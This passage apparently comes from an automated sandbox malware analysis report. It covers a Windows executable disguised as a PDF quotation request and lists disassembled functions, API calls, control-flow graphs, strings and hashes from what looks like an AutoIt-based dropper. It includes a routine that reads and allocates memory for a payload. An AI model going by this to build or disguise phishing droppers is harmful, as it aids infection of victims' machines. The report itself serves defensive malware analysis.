                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                    • String ID: Include$\
                                                                    • API String ID: 3173733714-3429789819
                                                                    • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                    • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                    Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _fseek.LIBCMT ref: 0045292B
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                                    • _fseek.LIBCMT ref: 004529BF
                                                                    • _malloc.LIBCMT ref: 004529CA
                                                                    • _malloc.LIBCMT ref: 004529D6
                                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                                    • _free.LIBCMT ref: 00452A17
                                                                    • _free.LIBCMT ref: 00452A20
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1255752989-0
                                                                    • Opcode ID: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                    • Opcode Fuzzy Hash: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                    Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                    • ImageList_ReplaceIcon.COMCTL32(00A43660,000000FF,00000000), ref: 00410552
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                    Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A43660,000000FF,00000000), ref: 00410552
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                    Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc
                                                                    • String ID: Default
                                                                    • API String ID: 1579825452-753088835
                                                                    • Opcode ID: 3608772f5542b4c0ace6e4954aa65356d17f2b2606532b6ce7229574407e7cd0
                                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                    • Opcode Fuzzy Hash: 3608772f5542b4c0ace6e4954aa65356d17f2b2606532b6ce7229574407e7cd0
                                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                    Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2137 40f5c0-40f5cf call 422240 2140 40f5d0-40f5e8 2137->2140 2140->2140 2141 40f5ea-40f613 call 413650 call 410e60 2140->2141 2146 40f614-40f633 call 414d04 2141->2146 2149 40f691 2146->2149 2150 40f635-40f63c 2146->2150 2151 40f696-40f69c 2149->2151 2152 40f660-40f674 call 4150d1 2150->2152 2153 40f63e 2150->2153 2156 40f679-40f67c 2152->2156 2155 40f640 2153->2155 2157 40f642-40f650 2155->2157 2156->2146 2158 40f652-40f655 2157->2158 2159 40f67e-40f68c 2157->2159 2160 40f65b-40f65e 2158->2160 2161 425d1e-425d3e call 4150d1 call 414d04 2158->2161 2162 40f68e-40f68f 2159->2162 2163 40f69f-40f6ad 2159->2163 2160->2152 2160->2155 2173 425d43-425d5f call 414d30 2161->2173 2162->2158 2165 40f6b4-40f6c2 2163->2165 2166 40f6af-40f6b2 2163->2166 2168 425d16 2165->2168 2169 40f6c8-40f6d6 2165->2169 2166->2158 2168->2161 2171 425d05-425d0b 2169->2171 2172 40f6dc-40f6df 2169->2172 2171->2157 2174 425d11 2171->2174 2172->2158 2173->2151 2174->2168
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                                    • String ID: AU3!$EA06
                                                                    • API String ID: 1268643489-2658333250
                                                                    • Opcode ID: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                    • Opcode Fuzzy Hash: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                    Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2177 401100-401111 2178 401113-401119 2177->2178 2179 401179-401180 2177->2179 2181 401144-40114a 2178->2181 2182 40111b-40111e 2178->2182 2179->2178 2180 401182 2179->2180 2185 40112c-401141 DefWindowProcW 2180->2185 2183 401184-40118e call 401250 2181->2183 2184 40114c-40114f 2181->2184 2182->2181 2186 401120-401126 2182->2186 2194 401193-40119a 2183->2194 2187 401151-401157 2184->2187 2188 40119d 2184->2188 2186->2185 2190 42b038-42b03f 2186->2190 2191 401219-40121f 2187->2191 2192 40115d 2187->2192 2195 4011a3-4011a9 2188->2195 2196 42afb4-42afc5 call 40f190 2188->2196 2190->2185 2193 42b045-42b059 call 401000 call 40e0c0 2190->2193 2191->2186 2199 401225-42b06d call 468b0e 2191->2199 2197 401163-401166 2192->2197 2198 42b01d-42b024 2192->2198 2193->2185 2195->2186 2202 4011af 2195->2202 2196->2194 2204 42afe9-42b018 call 40f190 call 401a50 2197->2204 2205 40116c-401172 2197->2205 2198->2185 2203 42b02a-42b033 call 4370f4 2198->2203 2199->2194 2202->2186 2209 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2202->2209 2210 4011db-401202 SetTimer RegisterWindowMessageW 2202->2210 2203->2185 2204->2185 2205->2186 2214 401174-42afde call 45fd57 2205->2214 2210->2194 2212 401204-401216 CreatePopupMenu 2210->2212 2214->2185 2228 42afe4 2214->2228 2228->2194
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                    • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                    Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2229 4115d7-4115df 2230 4115ee-4115f9 call 4135bb 2229->2230 2233 4115e1-4115ec call 411988 2230->2233 2234 4115fb-4115fc 2230->2234 2233->2230 2237 4115fd-41160e 2233->2237 2238 411610-41163b call 417fc0 call 41130a 2237->2238 2239 41163c-411656 call 4180af call 418105 2237->2239 2238->2239
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                    • String ID: ,*H$4*H$@fI
                                                                    • API String ID: 615853336-1459471987
                                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                    Function 03262658 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2248 3262658-3262706 call 3260048 2251 326270d-3262733 call 3263568 CreateFileW 2248->2251 2254 3262735 2251->2254 2255 326273a-326274a 2251->2255 2256 3262885-3262889 2254->2256 2263 3262751-326276b VirtualAlloc 2255->2263 2264 326274c 2255->2264 2257 32628cb-32628ce 2256->2257 2258 326288b-326288f 2256->2258 2260 32628d1-32628d8 2257->2260 2261 3262891-3262894 2258->2261 2262 326289b-326289f 2258->2262 2267 326292d-3262942 2260->2267 2268 32628da-32628e5 2260->2268 2261->2262 2269 32628a1-32628ab 2262->2269 2270 32628af-32628b3 2262->2270 2265 3262772-3262789 ReadFile 2263->2265 2266 326276d 2263->2266 2264->2256 2271 3262790-32627d0 VirtualAlloc 2265->2271 2272 326278b 2265->2272 2266->2256 2275 3262944-326294f VirtualFree 2267->2275 2276 3262952-326295a 2267->2276 2273 32628e7 2268->2273 2274 32628e9-32628f5 2268->2274 2269->2270 2277 32628b5-32628bf 2270->2277 2278 32628c3 2270->2278 2279 32627d7-32627f2 call 32637b8 2271->2279 2280 32627d2 2271->2280 2272->2256 2273->2267 2281 32628f7-3262907 2274->2281 2282 3262909-3262915 2274->2282 2275->2276 2277->2278 2278->2257 2288 32627fd-3262807 2279->2288 2280->2256 2284 326292b 2281->2284 2285 3262917-3262920 2282->2285 2286 3262922-3262928 2282->2286 2284->2260 2285->2284 2286->2284 2289 326283a-326284e call 32635c8 2288->2289 2290 3262809-3262838 call 32637b8 2288->2290 2295 3262852-3262856 2289->2295 2296 3262850 2289->2296 2290->2288 2298 3262862-3262866 2295->2298 2299 3262858-326285c CloseHandle 2295->2299 2296->2256 2300 3262876-326287f 2298->2300 2301 3262868-3262873 VirtualFree 2298->2301 2299->2298 2300->2251 2300->2256 2301->2300
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03262729
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0326294F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                    • Instruction ID: 03de9258a9b34da7dc0b766bc9acb6951a652727c3f4891b1b621312df08108b
                                                                    • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                    • Instruction Fuzzy Hash: F6A11774E11309EBDB14CFA4D894BEEB7B5BF48304F248599E601BB280D7799AC1CB64
                                                                    Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2302 4102b0-4102c5 SHGetMalloc 2303 4102cb-4102da SHGetDesktopFolder 2302->2303 2304 425dfd-425e0e call 433244 2302->2304 2306 4102e0-41031a call 412fba 2303->2306 2307 41036b-410379 2303->2307 2314 410360-410368 2306->2314 2315 41031c-410331 SHGetPathFromIDListW 2306->2315 2307->2304 2312 41037f-410384 2307->2312 2314->2307 2316 410351-41035d 2315->2316 2317 410333-41034a call 412fba 2315->2317 2316->2314 2317->2316
                                                                    APIs
                                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                    • String ID: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 3170942423-40546275
                                                                    • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                    • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                    • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                    • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                    Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
